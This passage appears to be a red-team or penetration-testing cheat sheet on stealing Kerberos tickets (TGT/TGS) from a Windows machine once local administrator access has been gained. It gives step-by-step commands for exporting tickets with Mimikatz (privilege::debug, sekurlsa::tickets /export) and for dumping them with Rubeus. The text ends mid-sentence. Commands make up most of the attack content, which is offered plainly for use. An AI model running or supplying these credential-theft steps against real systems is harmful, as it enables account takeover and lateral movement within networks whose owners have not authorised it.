Scenario:- After getting any low level user machine and have Local system administrators access, we can use Mimikatz or Rubes to get the AD tickets (TGT or TGS)  

Let's see the below steps to extract the kerberos tickets from Windows system (from the system which we got admin access) 

Option 1) Extract the tickets using Mimikatz 
          c:\tools> mimikatz.exe
          mimikatz # privilege::debug
          mimikatz # sekurlsa::tickets /export
          mimikatz # exit
          Bye!
          c:\tools> dir *.kirbi {Saved the hash in the file}

Option 2) Extract the tickets using Rubeus
          c:\tools> Rubeus.exe dump /nowrap

====================================================================================================================================

We can use the 
